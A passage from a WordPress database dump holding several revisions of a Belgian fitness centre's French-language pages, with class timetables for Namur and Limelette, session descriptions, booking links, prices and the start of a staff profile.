'361-revision-v1', '', '', '2014-02-09 20:36:26', '2014-02-09 20:36:26', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(430, 1, '2014-02-09 20:37:08', '2014-02-09 20:37:08', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-02-09 20:37:08', '2014-02-09 20:37:08', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(432, 1, '2014-02-09 20:39:58', '2014-02-09 20:39:58', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-02-09 20:39:58', '2014-02-09 20:39:58', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(431, 1, '2014-02-09 20:38:59', '2014-02-09 20:38:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-02-09 20:38:59', '2014-02-09 20:38:59', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(433, 1, '2014-02-09 20:41:07', '2014-02-09 20:41:07', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2014-02-09 20:41:07', '2014-02-09 20:41:07', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(436, 1, '2014-02-17 17:59:59', '2014-02-17 17:59:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" 